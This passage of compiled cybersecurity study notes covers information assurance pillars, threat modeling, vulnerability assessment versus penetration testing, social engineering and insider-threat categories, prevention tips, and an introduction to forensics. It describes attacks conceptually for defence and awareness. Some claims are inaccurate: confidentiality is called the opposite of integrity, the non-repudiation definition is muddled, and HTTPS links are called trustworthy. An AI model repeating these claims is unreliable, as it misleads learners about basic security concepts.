of information security (i.e. umbrella term), and as the business outcome of information risk
management.

Information assurance (IA) is the process of processing, storing, and transmitting the right
information to the right people at the right time. IA relates to the business level and strategic risk
management of information and related systems, rather than the creation and application of
security controls. IA is used to benefit business through the use of information risk management,
trust management, resilience, appropriate architecture, system safety, and security, which
increases the utility of information to only their authorized users.

Pillars of Information assurance

Information assurance is built between five pillars: availability, integrity, authentication,

confidentiality and nonrepudiation. These pillars are taken into account to protect systems while
still allowing them to efficiently provide services; However, these pillars do not act
independently from one another, rather they interfere with the goal of the other pillars.These
pillars of information assurance have slowly changed to become referred to as the pillars of
Cyber Security. As an administrator it is important to emphasize the pillars that you want in
order to achieve your desired result for their information system, balancing the aspects of
service, and privacy.

Authentication

Authentication refers to the verification of the validity of a transmission, originator, or process

within an information system.Authentication provides the recipient confidence in the data
senders validity as well as the validity of their message.There exists many ways to bolster
authentication, mainly breaking down into three main ways, personally identifiable information
such as a person's name, address telephone number, access to a key token, or known information,
like passwords.

Integrity

Integrity refers to the protection of information from unauthorized alteration. The goal of
information integrity is to ensure data is accurate throughout its entire lifespan.User
authentication is a critical enabler for information integrity. Information integrity is a function of
the number of degrees-of-trust existing between the ends of an information exchange . One way
information integrity risk is mitigated is through the use of redundant chip and software designs.
A failure of authentication could pose a risk to information integrity as it would allow an
unauthorized party to alter content. For example, if a hospital has inadequate password policies,
an unauthorized user could gain access to an information systems governing the delivery of
medication to patients and risk altering the treatment course to the detriment of a particular
patient.

Availability

The pillar of availability refers to the preservation of data to be retrieved or modified from
authorized individuals. Higher availability is preserved through an increase in storage system or
channel reliability.[8] Breaches in information availability can result from power outages,
hardware failures, DDOS, etc. The goal of high availability is to preserve access to information.
Availability of information can be bolstered by the use of backup power, spare data channels, off
site capabilities and continuous signal.

Confidentiality

Confidentiality is in essence the opposite of Integrity. Confidentiality is a security measure

which protects against who is able to access the data, which is done by shielding who has access
to the information. This is different from Integrity as integrity is shielding who can change the
information. Confidentiality is often ensured with the use of cryptography and steganography of
data. Confidentiality can be seen within the classification and information superiority with
international operations such as NATO Information assurance confidentiality in the United
States need to follow HIPAA and healthcare provider security policy information labeling and
need-to-know regulations to ensure nondisclosure of information.

Non-repudiation

Nonrepudiation is the integrity of the data to be true to its origin, which prevents possible denial
that an action occurred. Increasing non-repudiation makes it more difficult to deny that the
information comes from a certain source. In other words, it making it so that you can not dispute
the source/ authenticity of data. Non-repudiation involves the reduction to data integrity while
that data is in transit, usually through the use of a man-in-the-middle attack or phishing.

Threat Modeling

Definition
Threat modeling is a structured process with these objectives: identify security
requirements, pinpoint security threats and potential vulnerabilities, quantify threat
and vulnerability criticality, and prioritize remediation methods.
Threat modeling methods create these artifacts:

• An abstraction of the system

• Profiles of potential attackers, including their goals and methods
• A catalog of threats that could arise

How does threat modeling work?

Threat modeling works by identifying the types of threat agents that cause
harm to an application or computer system. It adopts the perspective of
malicious hackers to see how much damage they could do. When conducting
threat modeling, organizations perform a thorough analysis of the software
architecture, business context, and other artifacts (e.g., functional
specifications, user documentation). This process enables a deeper
understanding and discovery of important aspects of the system. Typically,
organizations conduct threat modeling during the design stage (but it can
occur at other stages) of a new application to help developers find
vulnerabilities and become aware of the security implications of their design,
code, and configuration decisions. Generally, developers perform threat
modeling in four steps:

• Diagram. What are we building?

• Identify threats. What could go wrong?
• Mitigate. What are we doing to defend against threats?
• Validate. Have we acted on each of the previous steps?
 Advantages of threat modeling
When performed correctly, threat modeling can provide a clear line of sight
across a software project, helping to justify security efforts. The threat
modeling process helps an organization document knowable security threats
to an application and make rational decisions about how to address them.
Otherwise, decision-makers could act rashly based on scant or no supporting
evidence.
Overall, a well-documented threat model provides assurances that are useful
in explaining and defending the security posture of an application or
computer system. And when the development organization is serious about
security, threat modeling is the most effective way to do the following:

• Detect problems early in the software development life cycle

(SDLC)—even before coding begins.
• Spot design flaws that traditional testing methods and code reviews
may overlook.
• Evaluate new forms of attack that you might not otherwise consider.
• Maximize testing budgets by helping target testing and code review.
• Identify security requirements.
• Remediate problems before software release and prevent costly
recoding post-deployment.
• Think about threats beyond standard attacks to the security issues
unique to your application.
• Keep frameworks ahead of the internal and external attackers relevant
to your applications.
• Highlight assets, threat agents, and controls to deduce components that
attackers will target.
• Model the location of threat agents, motivations, skills, and capabilities
to locate potential attackers in relation to the system architecture.

Misconceptions of threat modeling

As a security process, threat modeling is subject to several misconceptions.
Some people believe threat modeling is only a design-stage activity, some see
it as an optional exercise for which penetration testing or code review can
substitute, and some think the process is simply too complicated. The
following should help dispel some of these misconceptions:
Penetration testing and code reviews can’t substitute for threat
modeling. Penetration testing and secure code review are two activities that
are effective for finding bugs in code. However, security assessments (e.g.,
threat modeling) are better at uncovering design flaws.
There’s a good reason to conduct a threat model after
deployment. Understanding the issues in the current deployment influences
future security architecture strategy, and monitoring weaknesses allows for
faster and more effective remediation. Without understanding the potential
threats an application faces, you can’t ensure that you’re addressing all risks.
Threat modeling isn’t that complicated. Many developers are intimidated
by the idea of threat modeling. At first glance, it can seem daunting.
However, if you break up the tasks into workable steps, performing a threat
model on a simple web application—or even a complex architecture—
becomes systematic. The key is to start with basic best practices.

Enterprise Information Security Architecture

Information Security Architecture
Enterprise Information Security Architecture is a set of requirements, processes, principles,
and models that determine the current And/or future structure and behaviour of an
organization’s security processes, information security systems, personnel, and
organizational sub-units. It ensures that the security architecture and controls are in
alignment with the organization’s core goals and strategic direction. Though
Enterprise Information Security Architecture deals with information security, it relates more
broadly to the security practice of business. Optimization. Thus, it also
addresses business security architecture, performance management and security process
architecture. The main objective of implementing EISA is to make sure that IT security is in
alignment with business strategy.

Enterprises are struggling nowadays to achieve the balance between implementing

the security controls in the enterprise while allowing the employees to increase the
productivity and communicate the information easily. Enterprise security is not only about
protecting the infrastructure of the enterprise, but also the sensitive data flowing among the
organization. Security of enterprise is done in a generic manner by applying three ways [1,
2]:
Prevention – This involves preventing the networks from intruders by avoiding
security Breaches. This is normally done by the implementation of firewalls.
Detection – This process focuses on the detection of the attacks and the
breaches that are done over the network.
Recovery – Once an attack occurs, recovery is essential for preventing the
information asset of the enterprise that may damage due to the attack. For this,
some recovery mechanisms are being employed by the enterprises. Till date,
most of the researches and works have been done in the area of prevention and
detection of the attack.
Enterprise Information Security Architecture (EISA) could be a key component of an
information security program. the first function of EISA is to document and communicate
the artifacts of the safety program during a consistent manner. As such, the first deliverable
of EISA could be a set of documents connecting business drivers with technical
implementation guidance. These documents are developed iteratively through multiple levels
of abstraction.

Motives behind enterprise security

Enterprise security is getting difficult primarily due to the following reasons A.
Increasing threats- Enterprise organizations are continuously attacked by newer
With the aim of stealing the confidential information. Cybercriminals, hackers
are growing in a large number. It has been reported that in recent years, malware
are worse than previous attacks. Further, crime is getting more sophisticated
these days. All these factors need to be managed. B. Technology Complexity –
Security experts are dealing with threats as well as maintaining the change
with the effect of the new technologies like cloud computing, mobile
computing, Internet of things and virtualization. These new technologies are
creating a gap within the system which need to be addressed. C. Legacy security
procedures and techniques: From the past, many security techniques have been
used in the enterprises starting from firewalls, Intrusion Detection System/
Intrusion Prevention System (IDS/IPS), to host security software (i.e.,
antivirus software), and to security monitoring and compliance tools (i.e.,
SIEM, log management, etc.). These procedures are incapable of dealing with
the multidimensional threat.
 Vulnerability Assessment
Vulnerability assessment is used to find out the Vulnerabilities on the target
network. By using some automatic scanning tools and some manual support,
vulnerabilities, and threats can be identified. The tool will categorize these
vulnerabilities. When the vulnerabilities are classified, the security professional
prioritizes these vulnerabilities, and they decide which vulnerability will path first.
They will decide that they should reduce the risk level, or they should remove the
weaknesses. In the market, there are a lot of good tools. A vulnerability scan with
proper scoped can find out a lot about an environment, including common weaknesses
in applications, unapplied patches, gaps in network control, vulnerabilities software
versions. Using the vulnerability scanning tool, the security team can provide the
recommendation on how the vulnerabilities can exactly remediate with configuration
changes, patch management or hardening security infrastructure.

Vulnerability assessment Process

o Automated discovery of all assets is completed by the vulnerability
scanner within our environment.
o In the infrastructure, network and application, various vulnerabilities are
searched and identified.
o The vulnerabilities are identified according to risk and priority.
o Vulnerabilities are remediated by its security professional with configuration
changes, patch management or hardening security infrastructure.

Penetration testing
Penetration testing is used to find out the Vulnerabilities of a particular
network. Penetration testing determines that vulnerability is genuine or not. The
vulnerability will be considered as genuine and reflect on the report if a penetration
tester exploits a potentially vulnerable spot. If they are unavailable to find the spot,
the report will show unexploitable theoretical vulnerabilities. If we
exploit theoretical vulnerabilities, it will lead to Dos. It means it threatens the
network, so to exploit theoretical vulnerabilities is not a good idea. A penetration
tester tries to harm a customer's network by installing malicious software on the
customer's computer or taking down the server, or getting unauthorized access to the
customer's system. This step does not include in vulnerability assessment.

Penetration testing process

o Gathering the open-source intelligence
o Scanning and discovering
 o Identify the vulnerabilities
o Attack phase
o Risk analysis
o Send report

Differences between Vulnerability Assessment and

Penetration Testing
Vulnerability scanning and penetration testing are different from each
other. Penetration testing can exploit the vulnerabilities while a vulnerability scan
identifies the rank of vulnerability and report it. The differences between
Vulnerability assessment and penetration testing are as follows:

Breadth vs. Depth

Vulnerability coverage (breadth and depth) is the main difference
between penetration testing and vulnerability assessment.

Vulnerability assessment detects security weakness as many as possible. It is

the breadth over depth approach. To maintain the security status of the network,
security should be regularly employed; especially when ports opened, new services
added, and new equipment installed.

Penetration testing is used when the customer asserts that the security defense of
their network is strong, but they want to check whether they are hack-proof. It is
the depth over breadth approach.

The automation degree

Vulnerability assessment allows a wider coverage of vulnerability. It is
usually automated.

Penetration testing helps to dig deeper into the weakness. It is a combination

of manual and automated techniques.

Choice of professional
In the vulnerability assessment, automated testing does not require high skills.
Security department members can also perform it. However, the security employees
of a company may find some vulnerability, but they can't include them in the report.
So the vulnerability assessment vendor of the third party has more information.
 To perform penetration testing, we require a high level of expert. A service provider
of penetration testing always outsources it.

Choice of Vendors
The penetration testing and vulnerability assessment differences show that both
security testing is expert to guard the security of a network.

Vulnerability assessment is used to maintain security.

Penetration testing discovers the weakness of security.

To take advantage of penetration testing and vulnerability assessment is possible

only if you hire a high-quality vendor who has the ability to understand pen test and
vulnerability assessment. But most importantly, the vendor should have the ability
to translate the difference between vulnerability assessment and pen test to the
customer.

10 Types of Social Engineering Attacks

To prevent a social engineering attack, you need to understand what they

look like and how you might be targeted. These are the 10 most common
types of social engineering attacks to be aware of.

1. Phishing
Phishing is the most common type of social engineering attack, typically

using spoofed email addresses and links to trick people into providing login

credentials, credit card numbers, or other personal information. Variations of

phishing attacks include:

• Angler phishing – using spoofed customer service accounts on social

media
• Spear phishing – phishing attacks that target specific organizations or
individuals

2. Whaling
Whaling is another common variation of phishing that specifically targets

top-level business executives and the heads of government agencies. Whaling

attacks usually spoof the email addresses of other high-ranking people in the

company or agency and contain urgent messaging about a fake emergency or

time-sensitive opportunity. Successful whaling attacks can expose a lot of

confidential, sensitive information due to the high-level network access these

executives and directors have.

3. Diversion Theft
In an old-school diversion theft scheme, the thief persuades a delivery driver

or courier to travel to the wrong location or hand off a parcel to someone

other than the intended recipient. In an online diversion theft scheme, a thief

steals sensitive data by tricking the victim into sending it to or sharing it with

the wrong person. The thief often accomplishes this by spoofing the email

address of someone in the victim’s company—an auditing firm or a financial

institution, for example.

 4. Baiting
Baiting is a type of social engineering attack that lures victims into providing

sensitive information or credentials by promising something of value for free.

For example, the victim receives an email that promises a free gift card if

they click a link to take a survey. The link might redirect them to a spoofed

Office 365 login page that captures their email address and password and
sends them to a malicious actor.

5. Honey Trap
In a honey trap attack, the perpetrator pretends to be romantically or sexually

interested in the victim and lures them into an online relationship. The

attacker then persuades the victim to reveal confidential information or pay

them large sums of money.

6. Pretexting
Pretexting is a fairly sophisticated type of social engineering attack in which

a scammer creates a pretext or fabricated scenario—pretending to be an IRS

auditor, for example—to con someone into providing sensitive personal or

financial information, such as their social security number. In this type of

attack, someone can also physically acquire access to your data by pretending

to be a vendor, delivery driver, or contractor to gain your staff’s trust.

 7. SMS Phishing
SMS phishing is becoming a much larger problem as more organizations

embrace texting as a primary method of communication. In one method of

SMS phishing, scammers send text messages that spoof multi-factor

authentication requests and redirect victims to malicious web pages that

collect their credentials or install malware on their phones.

8. Scareware
Scareware is a form of social engineering in which a scammer inserts

malicious code into a webpage that causes pop-up windows with flashing

colors and alarming sounds to appear. These pop-up windows will falsely

alert you to a virus that’s been installed on your system. You’ll be told to

purchase and download their security software, and the scammers will either

steal your credit card information, install real viruses on your system, or

(most likely) both.

9. Tailgating/Piggybacking
Tailgating, also known as piggybacking, is a social engineering tactic in

which an attacker physically follows someone into a secure or restricted area.

Sometimes the scammer will pretend they forgot their access card, or they’ll

engage someone in an animated conversation on their way into the area so

their lack of authorized identification goes unnoticed.
 10. Watering Hole
In a watering hole attack, a hacker infects a legitimate website that their

targets are known to visit. Then, when their chosen victims log into the site,

the hacker either captures their credentials and uses them to breach the

target’s network, or they install a backdoor trojan to access the network.

What is Insider Attack?

Cyber attacks are attacks on Cyber networks involving the internet carried out
by professional cyber-hacking experts. The main motivation, which drives the
growing cyber crimes, is the ever-growing internet dependency. Over the
years, the use of computer networks making use of the internet has increased
enormously. Cyber criminals have taken advantage of this increasing demand
for internet-related services to exploit the privacy of users and organisations
that use computer networks to store their private information for ease among
many other advantages of using the internet.
Here, in this article, we will discuss a very risky form of cyber attack – Insider
Attacks in detail.
Although there exists a lot of Symmetric and Asymmetric key based
techniques exists for secure communication but if a person who have privilege
to access to stored credentials of users. In that scenario also our system should
be robust for that kind of things. Security breaches higher the risk of
vulnerabilities being exploited by attackers. Cyber criminals aim at breaching
the security loopholes to enter into the computer system and execute their
malicious intent of stealing private user information. The access of
confidential information to unauthorised individuals is a serious form of crime
and not accepted by law under any circumstances. Cyber crimes are thus
regarded as very dangerous in nature and must be taken care of from
happening in any aspect. Cyber attacks can be prevented by proper knowledge
of cyber attacks and facts about different cyber security techniques.
Insider Attack:
• Insider Attack gets their name as these are the attacks that people having
inside access to information cause.
• The inside people may be current or former employees, business partners,
contractors, or security admins who had access to the confidential
information previously.
• Insider Attacks are carried out by people who are familiar with the
computer network system and hold authorised access to all the
information.
• This form of cyber attack is extremely dangerous as the attack is led by the
system employees, which makes the entire process extremely vulnerable.
• Computer organisations , most likely focus on external cyber attack
protection and rarely have their attention focused on internal cyber-
attacks.
Insider Types:
• Malicious Insider: Someone who maliciously and intentionally misuses
legitimate credentials, usually stealing information for financial or
personal incentives. For example, someone who has a score against a
former employer or an opportunistic employee who sells sensitive
information to competitors.
• Careless Insider: An instrument that unknowingly exposes your system to
external threats. This is the most common type of internal threat caused by
a bug. If the device remains unprotected or becomes a victim of fraud. For
example, a harmless employee could click on an insecure link to infect a
system with malware.
• Mole: A scammer who is technically an outsider but has gained insider
access to a privileged network. This is an outsider of the organisation to
hide as an employee or partner.

Threat Indicators:

• Activity at unusual times: signing in to the network after working hours.

• The volume of traffic: transferring too much data via the network of the
company.
• The type of activity: accessing unusual resources.

Risk Analysis:

• Insider can be an adversory at any time and perform security attacks which
are descibed in the threat models.
• An Adversary (attacker) can find out one key(long term) value in
polynomial amount of time, in this scenario it becomes more hazardous to
the system.
• There are a lot of protocols exists in which the password fields of the users
are not stored in the Encrypted format in that case insider can find out the
password patterns of the user and sell to attackers which can lead them to
the password guessing attack with high probability.
 How can you prevent insider threats when none of your
insiders are actually “inside”?
Security teams can be so focused on blocking cyberattacks from outside that they turn
a blind eye to potential threats within their own organizations.

In fact, 34% of all breaches are caused by insider threats.

Insider threats are uniquely difficult to defend against because insiders inherently
require an elevated level of trust and access to get their jobs done. For example,
system administrators and other IT professionals may have a legitimate need to access
sensitive systems and data. But, can that trust is used as a cover?

Breaches caused by malicious hackers took even longer to

identify and contain
Insider attacks remained undetected for an average of 207 days in 2019, with a mean
time to contain 73 days. In 2019, breaches caused by malicious cybercriminals took
even longer to identify and contain—314 days—with an average cost of more than
$1.6 million.

Despite the challenges, you can effectively defend against insider threats. In fact, as
I’ll explore in this blog, many of the most infamous insider attacks could have been
prevented with the right combination of policies, training, systems, and oversight.

Are you prepared for an insider attack? This is how you get
started:
Download our free customizable cybersecurity incident response
plan template.
The faster you respond to an incident, the less damage it will cause.

What are insider threats?

Insider threats take many forms. Some are malicious actors looking for financial gain.
Others are simply careless or unsuspecting employees who click an email link, only to
unleash a torrent of malware. Insider attacks may be performed by people unwittingly
lured into committing bad behavior.

The Verizon Data Breach Investigations Report (DBIR) explains insider threats this
way: “An insider threat can be defined as what happens when someone close to an
organization, with authorized access, misuses that access to negatively impact the
organization’s critical information or systems.”

Insiders include consultants, third-party contractors, vendors

…
By extension, “insiders” aren’t exclusively people who work for your organization
directly. Insiders include consultants, third-party contractors, vendors, and anyone
who has legitimate access to some of your resources.

The Verizon Insider Threat Report defines five categories of actors behind
insider threats:

1. The Careless Worker: An employee/partner who performs inappropriate

actions that aren’t intentionally malicious. They’re often looking for ways to
get their jobs done, but in the process misuse assets, don’t follow acceptable
use policies, and install unauthorized or dubiously sourced applications.
2. The Feckless Third Party: A partner who compromises security through
negligence, misuse, or malicious access to or use of an asset. Sometimes it’s
intentional and malicious; sometimes it’s just due to carelessness. For example,
a system administrator might misconfigure a server or database, making it open
to the public rather than private and access-controlled, inadvertently exposing
sensitive information.
3. The Insider Agent: A compromised insider either recruited, bribed, or
solicited by a third party to exfiltrate information and data. People under
financial stress are prime targets, as are conscientious objectors who disagree
with the corporate mission.
4. The Disgruntled Employee: A jilted or maligned employee who is motivated
to bring down an organization from the inside by disrupting the business and
destroying or altering data.
5. The Malicious Insider: A person with legitimate privileged access to
corporate assets, looking to exploit it for personal gain, often by stealing and
repurposing the information.

Insider threat examples: There are plenty of examples of each type of inside actor,
from conspirators (American Superconductor) to malicious insiders looking for
financial gain (Otto), to conscientious objectors (Edward Snowden), to careless or
unwitting actors.
I’ll delve into those case studies shortly, but first, let’s talk about the broad impact of
insider attacks.

Impact of insider attacks

Columbia University researchers surveyed the most common types of insider threat
activities. The list ranges from seemingly innocuous actions taken by individuals to
intentionally illegal activities:

• Unsanctioned removal, copying, transfer, or other forms of data exfiltration

• Misusing organizational resources for non-business related or unauthorized
activities
• Data tampering, such as unsanctioned changes to data
• Deletion or destruction of sensitive assets
• Downloading information from dubious sources
• Using pirated software that might contain malware or other malicious code
• Network eavesdropping and packet sniffing
• Spoofing and illegally impersonating other people
• Devising or executing social engineering attacks
• Purposefully installing malicious software

Whether the damage is caused intentionally or accidentally, the consequences of

insider attacks are very real.

Preventing insider attacks is getting more difficult

The attack surface has been evolving, making it increasingly difficult to detect and
prevent insider attacks. The prevalence of BYOD, the proliferation of SaaS tools and
applications, and the migration of data to the cloud have changed the nature of the
corporate perimeter. The variety, breadth, and dispersed nature of access points make
it harder for you to control the security environment and give attackers the upper hand
in hiding their tracks.

These changes have cybersecurity experts and IT departments concerned about users
accessing systems outside the corporate perimeter leading to an increased likelihood
of data leakage.

It’s not only that there are more devices used to access the corporate network; it’s that
so many of the phones and laptops are unsecured, making it harder for you to detect
rogue devices within the forest of benign ones.

On average, nearly a quarter of all employees are privileged users. Privileged users
have access to a wider array of sensitive systems and data than standard users. Some
privileged users may have a legitimate need for that increased access. But not
everyone does. When so many insiders have elevated privileges, it’s hard to
differentiate between legitimate and aberrant behavior.
These days, during the COVID-19 pandemic, there are many more “insiders” working
outside of an organization. People working remotely expect and need the same access
to systems that they have while in the office. Yet, IT teams have less visibility and
control, which increases the risk of insider threats.

When proper off-boarding protocols are forgotten, the gaps

give former employees opportunities to exact revenge
In some organizations, employees are being let go. When this happens quickly, proper
off-boarding protocols and processes may be forgotten. Privileged accounts may
remain enabled, employees may retain company-issued laptops, and passwords may
not be changed or disabled as they should. Gaps like these give former employees the
opportunity to steal IP, plant malware, and exact revenge.

As all of these risk factors increase, insiders (and the criminals who stalk them) have
become more sophisticated in their use of technology, their ability to cover their
tracks, and to navigate corporate networks surreptitiously.

That said, it’s possible to detect insider threats before they cause damage. First, let’s
explore some high-profile insider threats from the past few years. Then, I’ll cover how
these types of breaches could have been discovered and possibly prevented.

Social Engineering Targets and Defense Strategies.

What is social engineering

Social engineering is the term used for a broad range of malicious activities
accomplished through human interactions. It uses psychological manipulation
to trick users into making security mistakes or giving away sensitive
information.

Social engineering attacks happen in one or more steps. A perpetrator first

investigates the intended victim to gather necessary background information,
such as potential points of entry and weak security protocols, needed to
proceed with the attack. Then, the attacker moves to gain the victim’s trust
and provide stimuli for subsequent actions that break security practices, such
as revealing sensitive information or granting access to critical resources.
Social Engineering Attack Lifecycle

What makes social engineering especially dangerous is that it relies on

human error, rather than vulnerabilities in software and operating systems.
Mistakes made by legitimate users are much less predictable, making them
harder to identify and thwart than a malware-based intrusion.

Social engineering attack techniques

Social engineering attacks come in many different forms and can be

performed anywhere where human interaction is involved. The following are
the five most common forms of digital social engineering assaults.

Baiting

As its name implies, baiting attacks use a false promise to pique a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or inflicts their systems with malware.

The most reviled form of baiting uses physical media to disperse malware.
For example, attackers leave the bait—typically malware-infected flash
drives—in conspicuous areas where potential victims are certain to see them
(e.g., bathrooms, elevators, the parking lot of a targeted company). The bait
has an authentic look to it, such as a label presenting it as the company’s
payroll list.
Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online forms of baiting consist of enticing ads that lead to malicious sites or
that encourage users to download a malware-infected application.

Scareware

Scareware involves victims being bombarded with false alarms and fictitious
threats. Users are deceived to think their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners

appearing in your browser while surfing the web, displaying such text such
as, “Your computer may be infected with harmful spyware programs.” It
either offers to install the tool (often malware-infected) for you, or will direct
you to a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings,
or makes offers for users to buy worthless/harmful services.

Pretexting

Here an attacker obtains information through a series of cleverly crafted lies.

The scam is often initiated by a perpetrator pretending to need sensitive
information from a victim so as to perform a critical task.

The attacker usually starts by establishing trust with their victim by

impersonating co-workers, police, bank and tax officials, or other persons
who have right-to-know authority. The pretexter asks questions that are
ostensibly required to confirm the victim’s identity, through which they
gather important personal data.

All sorts of pertinent information and records is gathered using this scam,
such as social security numbers, personal addresses and phone numbers,
phone records, staff vacation dates, bank records and even security
information related to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams
are email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. It then prods them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

An example is an email sent to users of an online service that alerts them of a

policy violation requiring immediate action on their part, such as a required
password change. It includes a link to an illegitimate website—nearly
identical in appearance to its legitimate version—prompting the unsuspecting
user to enter their current credentials and new password. Upon form
submittal the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in

phishing campaigns, detecting and blocking them are much easier for mail
servers having access to threat sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam whereby an attacker

chooses specific individuals or enterprises. They then tailor their messages
based on characteristics, job positions, and contacts belonging to their victims
to make their attack less conspicuous. Spear phishing requires much more
effort on behalf of the perpetrator and may take weeks and months to pull off.
They’re much harder to detect and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, in impersonating

an organization’s IT consultant, sends an email to one or more employees.
It’s worded and signed exactly as the consultant normally does, thereby
deceiving recipients into thinking it’s an authentic message. The message
prompts recipients to change their password and provides them with a link
that redirects them to a malicious page where the attacker now captures their
credentials.
 Social engineering prevention

Social engineers manipulate human feelings, such as curiosity or fear, to

carry out schemes and draw victims into their traps. Therefore, be wary
whenever you feel alarmed by an email, attracted to an offer displayed on a
website, or when you come across stray digital media lying about. Being alert
can help you protect yourself against most social engineering attacks taking
place in the digital realm.

Moreover, the following tips can help improve your vigilance in relation to
social engineering hacks.

• Don’t open emails and attachments from suspicious sources – If you don’t
know the sender in question, you don’t need to answer an email. Even if you
do know them and are suspicious about their message, cross-check and
confirm the news from other sources, such as via telephone or directly from a
service provider’s site. Remember that email addresses are spoofed all of the
time; even an email purportedly coming from a trusted source may have
actually been initiated by an attacker.
• Use multifactor authentication – One of the most valuable pieces of
information attackers seek are user credentials. Using multifactor
authentication helps ensure your account’s protection in the event of system
compromise. Imperva Login Protect is an easy-to-deploy 2FA solution that
can increase account security for your applications.
• Be wary of tempting offers – If an offer sounds too enticing, think twice
before accepting it as fact. Googling the topic can help you quickly determine
whether you’re dealing with a legitimate offer or a trap.
• Keep your antivirus/antimalware software updated – Make sure
automatic updates are engaged, or make it a habit to download the latest
signatures first thing each day. Periodically check to make sure that the
updates have been applied, and scan your system for possible infections.

Top 10 Ways to Prevent Social

Engineering Attacks
1. Multi-Factor Authentication

Don’t rely on one factor – the most basic preventive measure guarantees your
account security. Of course, the password ensures security, but we have realized
they’re inadequate on its own. Because it is far easier for someone else to guess your
password and obtain access to your accounts.

The passwords can be accessed through social engineering. Multi-Factor verification

is required that could be anything from biometric access, security questions to an
OTP code.

2. Continuously Monitor Critical System

Make sure your system, which houses sensitive information is being monitored 24 x
7. When certain exploiting tactics are employed like Trojans, they sometimes
depend on the system, which is vulnerable. Scanning both external and internal
systems with web application scanning can help to find vulnerabilities in your
system.

Besides, you should also perform a social engineering engagement at least once a
year to assess whether your employees would fall victim to the dangers of social
engineering. Once tracked, fake domains, if any, can be taken down instantly to
avoid copyright infringement online.

3. Utilize Next-Gen cloud-based WAF

You’re probably already employing a firewall within your business, but a next-
generation web application cloud-based firewall is specially designed to ensure
maximum protection against social engineering attacks. The web WAF is very
different from the traditional WAF that most companies deploy.

To be specific, AppTrana can consistently monitor a web application or website for

anomalous activity and misbehavior. Although social engineering threats depend on
human mistakes, it will block attacks and alerts you to any endeavored malware
installations. Implementing risk-based WAF is one of the best ways to prevent social
engineering attacks and any potential infiltration.

4. Verify Email Sender’s Identity

Most scams involve the method of falsely obtaining victim’s information by

pretending as a trusted entity. Especially in a phishing attack, attackers send email
messages that may appear like they are from a sender you trust like from a credit
card company, a bank, a social networking site, or an online store. The emails often
tell a story to make you click onto the false link, which looks legitimate.

To avoid this kind of social engineering threats, contact the claimed sender of the
email message and confirm whether he sent the email or not. Remember, legitimate
banks will not ask your authorized credentials or confidential information through
email.

5. Identify your critical assets which attract

criminals

“When a lot of companies focus on protecting their assets, they’re very focused on
that from the perspective of their business” – Jim O’Gorman, a member of Social-
Engineer.org

That is not necessarily the approach hacker will target your company. They always
target the assets valuable to them.

You should evaluate in the attacker’s perspective and identify what to protect,
considering the assets beyond your product, service, or intellectual property.

“Independent Assessment is the best tool to determine which of your assets criminals
are most likely to target.” – according to O’Gorman.

6. Check for SSL Certificate

Encrypting data, emails, and communication ensure that even if hackers intercept
your communication, they can’t be able to access the information contained within.
This can be achieved by obtaining SSL certificates from trusted authorities.

Furthermore, always verify the site, which asks for your sensitive information. To
verify the website’s authenticity, check the URLs. The URLs which start
with https:// can be considered as trusted and encrypted website. The websites
with http:// are not offering a secure connection.

7. Penetration Testing

The most effective approach among the ways to prevent social engineering attacks is
conducting a pen-test to detect and try to exploit vulnerabilities in your organization.
If your pen-tester succeeds in endangering your critical system, you can identify
which system or employees you need to concentrate on protecting as well as the
types of social engineering attacks you may be prone to.

Learn more about how application Pen testing can mitigate Fraud.

8. Check and Update your Security Patches

Cybercriminals are generally looking for weaknesses in your application, software,

or systems to attain unauthorized access to your data. As a preventive measure,
always maintain your security patches up to date and keep your web browsers &
systems up to date with the latest versions.

This is because companies release security patches as a response whenever they

uncover security loopholes. Maintaining your systems with the recent release will
not only reduce the possibilities of cyber-attacks but will also ensure a cyber-
resilient environment.

9. Enable Spam Filter

Enable Spam filters and close the door for offenders of social engineering security
threats. Spam filters offer vital services in protecting your inboxes from social
engineering attacks.

Most email service providers offer spam filters that hold the emails which are
deemed as suspicious. With spam features, you can categorize emails effortlessly,
and freed from the horrible tasks of identifying mistrustful emails.

10. Pay Attention to Your Digital Footprint

Oversharing of personal details online through social media can give these criminals
more information to work with. For instance, if you keep your resume online, you
should consider censoring your date of birth, phone number, and residential address.
All that information is useful for attackers who are planning a social engineering
threat.
 Cyber Forensics and Auditing:
Introduction to Cyber Forensics
Introduction
Cyber forensics is the process of obtaining data as evidence for a crime (using electronic
equipment) while adhering to correct investigative procedures to apprehend the offender by
presenting the evidence to the court. Computer forensics is another name for cyber forensics.
Maintaining the chain of evidence and documentation to identify the digital criminal is the
primary goal of cyber forensics.

It is crucial to make a digital copy of the system's unique storage cell during the examination. To
identify who is responsible for a security breach, a thorough cyber forensics investigation is
conducted. While assuring that the system is not impacted, a full investigation is conducted on
the software copy.

Cyber forensics is an unavoidable and crucial element in the modern era, thus cyber forensics
plays a huge role in incident response.

So CyberForensics don't only talk about just the technology, they also talk about the human in
the loop read this case study on Sony Hack and also do refer to the slides given below where I
talk about the different practices in DevSecOps that you can use for understanding the challenges
in SDLC, this is even before we have a compromised system. The Challenges, strategies, and the
decision of using the right tool in the SDLC.Do See the slides here.

Cyber forensics is a process of extracting data as proof for a crime (that involves
electronic devices) while following proper investigation rules to nab the culprit by
presenting the evidence to the court. Cyber forensics is also known as computer
forensics. The main aim of cyber forensics is to maintain the thread of evidence and
documentation to find out who did the crime digitally. Cyber forensics can do the
following:
• It can recover deleted files, chat logs, emails, etc
• It can also get deleted SMS, Phone calls.
• It can get recorded audio of phone conversations.
• It can determine which user used which system and for how much time.
• It can identify which user ran which program.

Why is cyber forensics important?

in todays technology driven generation, the importance of cyber forensics is immense.

Technology combined with forensic forensics paves the way for quicker investigations
and accurate results. Below are the points depicting the importance of cyber forensics:
• Cyber forensics helps in collecting important digital evidence to trace the criminal.
• Electronic equipment stores massive amounts of data that a normal person fails to
see. For example: in a smart house, for every word we speak, actions performed by
